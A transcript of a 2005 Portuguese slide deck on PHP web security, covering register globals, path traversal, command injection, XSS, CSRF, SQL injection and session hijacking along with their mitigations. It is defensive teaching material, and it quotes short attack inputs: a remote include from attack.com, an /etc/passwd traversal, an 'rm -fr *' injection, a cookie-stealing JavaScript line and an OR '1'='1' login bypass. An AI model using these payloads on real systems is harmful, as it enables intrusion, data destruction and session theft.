A apresentação está carregando. Por favor, espere

A apresentação está carregando. Por favor, espere

Segurança em PHP Exemplos e Casos Práticos Nuno Lopes, NEIIST – 3º Ciclo de Apresentações. 17/Março/2005.

PublicouThalita Delgado Alterado mais de 10 anos atrás

Apresentações semelhantes

Apresentação em tema: "Segurança em PHP Exemplos e Casos Práticos Nuno Lopes, NEIIST – 3º Ciclo de Apresentações. 17/Março/2005."— Transcrição da apresentação:

1 Segurança em PHP Exemplos e Casos Práticos Nuno Lopes, NEIIST – 3º Ciclo de Apresentações. 17/Março/2005

2 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Cross-Site Request Forgeries (CSRF) SQL Injection Session Hijacking Links Questões

3 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Cross-Site Request Forgeries (CSRF) SQL Injection Session Hijacking Links Questões

4 Register Globals Configuração do PHP insegura Não usar / desactivar !! script.php?autenticado=1 <? $autenticado = false; if ($_POST[user] == 'user' (...) ?> register_globals=Off

5 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Cross-Site Request Forgeries (CSRF) SQL Injection Session Hijacking Links Questões

6 Paths Includes perigosos levam a execução remota de código Visualização de ficheiros confidenciais script.php?file=http://attack.com/script script.php?file=../../../../etc/passwd basename() / dirname() realpath() pathinfo() allow_url_fopen=Off

7 Paths Execução de comandos no servidor script.php?opts=-la | rm –fr * escapeshellarg() escapeshellcmd() safe_mode=On

8 Paths Roubo de códigos Order allow, deny Deny from all # /path/to/secret-stuff (root only) SetEnv DB_USER "myuser" SetEnv DB_PASS "mypass" # httpd.conf Include "/path/to/secret-stuff"

9 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Cross-Site Request Forgeries (CSRF) SQL Injection Session Hijacking Links Questões

10 Cross-Site Scripting (XSS) Inserção de HTML/JavaScript numa página (através de variáveis não filtradas) Permite roubo de sessões, passwords, etc.. document.location = 'http://example.org/steal_cookies.php?cookie=' + document.cookie strip_tags() htmlentities() / htmlspecialchars()

11 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Cross-Site Request Forgeries (CSRF) SQL Injection Session Hijacking Links Questões

12 Cross-Site Request Forgeries (CSRF) Método pouco usado em exploits (por enquanto…) Mas muito poderoso e difícil de defender Bastante transversal "sea surf" [img]http://your.forums/newreply.php?action=newthread&subject=aaa& body=some+naughty+words&submit=go[/img]

13 Cross-Site Request Forgeries (CSRF) Não há receitas, depende do programa Usar POST em vez de GET Forçar o uso de forms próprios via TOKEN aleatório "sea surf"

14 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Cross-Site Request Forgeries (CSRF) SQL Injection Session Hijacking Links Questões

15 SQL Injection Fácil de evitar: Filtrar dados por tipo Usar aspas Não mostrar erros (i.e. mysql_error())

16 SQL Injection script.php?user=admin' OR '1'='1&pass= SELECT * FROM tabela WHERE user='admin' OR '1'='1' AND pass=' '

17 SQL Injection Usar cast explícito para inteiros mysql_real_escape_estring() Usar hashes nos códigos (md5()/sha1()) Cuidado com wildcards (...LIKE %aeiou%) Atenção às queries múltiplas 50) display_user_error(); ?>

18 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Cross-Site Request Forgeries (CSRF) SQL Injection Session Hijacking Links Questões

19 Session Hijacking Roubo de sessões Usar SSL e fazer lock ao IP (e ao certificado do cliente) Usar apenas cookies (evita URLs do tipo script.php?PHPSESSID=jfh92lpgmc7s6fj e ataques pelo HTTP REFERER)

20 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Cross-Site Request Forgeries (CSRF) SQL Injection Session Hijacking Links Questões

21 Links www.php.net/security www.phpsec.org www.owasp.org www.securityfocus.com www.phpsecure.info www.net-force.nl http://mega.ist.utl.pt/~ncpl/pres/

22 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Cross-Site Request Forgeries (CSRF) SQL Injection Session Hijacking Links Questões

Carregar ppt "Segurança em PHP Exemplos e Casos Práticos Nuno Lopes, NEIIST – 3º Ciclo de Apresentações. 17/Março/2005."

Apresentações semelhantes

What the bad guys will try and what ASP.NET 2.0 does to protect you! Rui Quintino DevScope

What the bad guys will try and what ASP.NET 2.0 does to protect you! Rui Quintino DevScope
Introdução à Arquitectura de aplicações para a Web

Introdução à Arquitectura de aplicações para a Web
Química em nosso cotidiano 2012 aulas =

Química em nosso cotidiano 2012 aulas =
Pontifícia Universidade Católica de Campinas

Pontifícia Universidade Católica de Campinas
OWASP AppSec Brazil 2010, Campinas, SP

OWASP AppSec Brazil 2010, Campinas, SP
Segurança em aplicações Web Exemplos e Casos Práticos em Nuno Lopes, NEIIST – 7º Ciclo de Apresentações. 28/Março/2007.

Segurança em aplicações Web Exemplos e Casos Práticos em Nuno Lopes, NEIIST – 7º Ciclo de Apresentações. 28/Março/2007.
Engenharia de Software Alessandro Cruz Marcelo Brandão Theodoro Júnior

Engenharia de Software Alessandro Cruz Marcelo Brandão Theodoro Júnior
SIP Working Group Comunicação de Dados IV Marina Swan Pâmella Almeida.

SIP Working Group Comunicação de Dados IV Marina Swan Pâmella Almeida.
Trac é uma ferramenta open source e de interface web para controle de projetos de desenvolvimento de software. O objetivo do software é ajudar o desenvolvedor.

Trac é uma ferramenta open source e de interface web para controle de projetos de desenvolvimento de software. O objetivo do software é ajudar o desenvolvedor.
Luiz Miguel Picelli Sanches – Script em php - Formulário Scripts no formato PHP.

Luiz Miguel Picelli Sanches – Script em php - Formulário Scripts no formato PHP.
Sensores de Presença R. Johnson

Sensores de Presença R. Johnson
Curso de Engenharia Industrial Madeireira – UFPR Prof. Umberto Klock

Curso de Engenharia Industrial Madeireira – UFPR Prof. Umberto Klock
Linguagens Formais e Tradutores Linguagens Regulares (Revisão)

Linguagens Formais e Tradutores Linguagens Regulares (Revisão)
Autenticação em ASP.NET

Autenticação em ASP.NET
Cookies e Sessões Mauro César Lopes. Mecanismos para guardar estados entre requisições HTTP HTTP é um protocolo sem estado Uma requisição é independente.

Cookies e Sessões Mauro César Lopes. Mecanismos para guardar estados entre requisições HTTP HTTP é um protocolo sem estado Uma requisição é independente.
Segurança em Web 2.0 Paola Garcia Juarez

Segurança em Web 2.0 Paola Garcia Juarez
Ferramenta para teste de software

Ferramenta para teste de software
E.B 1 de Fornos de Algodres

E.B 1 de Fornos de Algodres
Desenvolvimento de Soluções WEB Escopos de uma Aplicação Web

Desenvolvimento de Soluções WEB Escopos de uma Aplicação Web
Wagner Elias > Extreme Web Hacking São Paulo, 09/11/2008

Wagner Elias > Extreme Web Hacking São Paulo, 09/11/2008

Apresentações semelhantes

Anúncios Google